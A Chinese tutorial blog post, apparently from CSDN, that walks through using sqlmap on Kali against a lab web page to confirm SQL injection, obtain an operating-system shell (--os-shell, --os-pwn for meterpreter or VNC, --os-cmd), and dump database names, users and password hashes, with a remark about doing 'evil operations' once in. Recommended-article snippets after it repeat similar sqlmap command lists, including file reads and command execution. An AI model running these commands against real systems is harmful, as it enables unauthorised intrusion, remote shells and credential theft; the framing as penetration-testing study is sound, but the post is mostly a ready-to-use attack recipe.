sqlmap注入php,Kali-SQLmap寻找注入点入侵电脑

最新推荐文章于 2024-04-22 18:50:20 发布
最新推荐文章于 2024-04-22 18:50:20 发布
阅读量805 收藏 16
点赞数 1
文章标签: sqlmap注入php

SQLmap命令

测试一次入侵

内网搭建的注入点

1.打开kali终端输入

-u //目标地址,检查该注入点是否存在注入sqlmap -u "http://192.168.207.131/demo/sql.php?news=1"

没有出现红色的报错证明该注入寻在注入

954c918ad7b93d8816dc92422f5de29c.png

2.直接进行暴力拿shell(如果失败进行第三步)sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-shell //获取该服务器的shell

5095e29a7fee02129208bb0e2983ea89.png

这里选择该网站使用的语言(默认是PHP)选择4然后一直回车

这里成功获取到shell,权限足够的话,可以直接进行一些邪恶的操作

8a600d60428e2ea6a1a232d922c2b846.png

3.没有获取成功也别急可以试试另外几个sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-pwn //获取一个OOB shell,meterpreter或VNC

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-smbrelay // 一键获取一个OOB shell,meterpreter或VNC

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --os-cmd=OSCMD //执行操作系统命令

4.猜解库名(都不行看这里)sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --dbs //猜解数据库表名

a0633871748fda0bd4a7c19ddd115a2e.png

5.直接猜解数据库的用户名和该数据库密码的哈希值sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --users //枚举数据库管理系统用户

sqlmap -u "http://192.168.207.131/demo/sql.php?news=1" --passwords //枚举数据库管理系统用户密码哈希

334b8076be43e43eb1dbdb13b92aab00.png

f96ba0ddfd53db02189ad4e7d7bc755c.png

--小顾

分享到:更多

马斯科蛙的彼得
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
sqlmap命令详解
Pitbull2014的博客
12-20 1093
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
SQL注入——渗透day07
qq_62716256的博客
09-01 980
wql注入
SQL注入sqlmap入门教程_sqlmap注入
yy1715713348的博客
04-22 326
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
SQL注入注入点找法
m0_67390969的博客
07-28 1738
2,交互点一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//www.xxx.com/index.phpid=1这种很大程度存在注入当然有些注入点不会这么一眼看出会有些比较复杂例如http//www.xxx.com50006/index.phpx=home&c=View&a=index&aid=9这样的地址其实也可能存在注入。1,注入点首先观察搜索框的地址是否是有与数据库交互,例如html这种几乎是不存在注入的所以要先判断是否有交互。...
sqlmap工具基本使用(检测sql注入
m0_37570494的博客
01-25 6115
sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1、先检测是否可以注入,先判断是否可以正常注入sqlmap -u url -v 3 里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测 2、爆库 sqlmap.py -u http://...
SQL注入-SQLMAP基础使用
xdjxi的博客
02-19 2209
实验目的 了解SQLMAP实验步骤的工作原理,熟悉SQLMAP的常用命令,掌握SQLMAP的-r参数的基本使用方法。 实验步骤 本实验的目标是:以SQLi-Labs 网站的Less-4为入口,利用SQLMAP实施自动化SQL注入,获取 SQLi-Labs 网站的登录用户名和密码。 1.访问SQLi-Labs 网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的sQLi-Labs 网站Less-4。访问的URL为:http:/ / [靶机 IP]..
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part4)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用: kali-linux-2022.2-virtualbox-amd64.part1 ...kali-linux-2022.2-virtualbox-amd...
sqlmap手册.zip
06-09
sqlmap用户手册,sqlmap命令详解,多文档,更详细 1. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -f -b –current-user –current-db –users –passwords –dbs -v 0 2. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -b –passwords -U root –union-use -v 2 3. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -b –dump -T users -C username -D userdb –start 2 –stop 3 -v 2 4. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -b –dump -C “user,pass” -v 1 –exclude-sysdbs 5. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -b –sql-shell -v 2 6. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -b –file-read “c:\boot.ini” -v 2 7. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -b –file-write /test/test.txt –file-dest /var/www/html/1.txt -v 2 8. ./sqlmap.py -u http://www.evil0x.com/ test.php?p=2 -b –os-cmd “id” -v 1
kali下的使用sqlmap自动检测SQLol中select模块下的注入点(一)
xianjie0318的博客
07-03 4799
一、kali linux下载、安装以及配置1、kali linux简介       Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。2、kali linux下载官方下载地址:https://www.kali.org/downl...
[极客大挑战 2019]LoveSQL
qq_45237160的博客
01-09 451
然后爆表名,有geekuser,l0ve1ysq1两个表 注意:数据库名字要用单引号括起来。(这里我在2那个地方注入会报错,只能在3那里注入成功,不知道什么原因)找到flag对应的password,成功发现flag。访问目标地址,出现下面酷酷的页面,最上面有提示。万能语句注入测试,成功,判断为单引号字符型注入。我用sqlmap扫了一下,果然扫不出来注入点。order by为4时报错,为3时页面正常。尝试联合注入,成功,判断列数为3列。接下来爆破数据库名,为geek。接下来测试回显点,为2,3。
kali上使用sqlmap进行爆破
learninger12的博客
02-13 6171
sqlmap进行爆破 接下来看一下sqlmap的版本: 我们进行爆破的时候,一定要找有注入点的,比如这样的: 再来一个没有注入的,来做一下对比: 这里我们就可以看的出来,在地址栏中,我们会发现,有注入的,在网址的最后面会有一些不同的东西,没有注入的就没有东西,我们要找的就是有注入的东西,这样我们才能对网站进行爆破,下面进行爆破,获取网站的一些基本信息: 看上图的下方区域,我们可以清楚的看到一些基础信息,这里就不过多的解释了。 接下来是查...
sqlmap入门-判断注入
weixin_46626737的博客
11-14 6773
①找到目标站,查看源代码,或者查找子链接,寻找可以尝试注入的参数,大多为$POST['a'],也有$GET['a'],当中a为可尝试注入的参数 还有比如点击子链接url中出现http://www.*****.com/****.php?a=1 出现http://www.******.com/*****.php?a=1&b=a等等 ②get型的注入命令,基本为python sqlmap.py(换到相应路径) -u "url" --level 1-5 ③post型的注入命令给,可以用brup...
sqlmap使用教程
w342164796的博客
09-25 378
sqlmap 安装 git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 检查注入sqlmap -u http://aa.com/star_photo.php?artist_id=11 爆出所有数据库信息 sqlmap -u http://aa.com/star_photo.php?artist_i...
kali下Burpsuite对网站后台注入php木马
qq_43776408的博客
05-20 2180
先给kali浏览器设置代理 后面输入你的端口号 打开后,先关闭拦截 因为i我们只要拦截重要的就行了 接下来打开浏览器 访问我们搭建的网站 这时在点击开始拦截就可以了 右键空白 send to repeater 送往中继器 因为中继器是可以改包的 然后你切换到Burp的中继器 你就在刚才那个界面上找,肯定能找到repeaterCHR是加密的,防止别查杀 %0a和%0d是回车和换行的,ASCII码 eval函数可以把一段字符串当作php代码运行 常用于黑客 一般杀毒软件过滤eval函数 CHR可以对eva.
sqlmap盲注kali
最新发布
06-03
SQLMAP是一种流行的SQL注入工具,它可以用来测试网站是否容易受到SQL注入攻击。SQLMAP可以自动检测并利用漏洞,它支持多种数据库(如MySQL、Oracle、PostgreSQL等)和操作系统(如Windows、Linux等)。在使用SQLMAP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值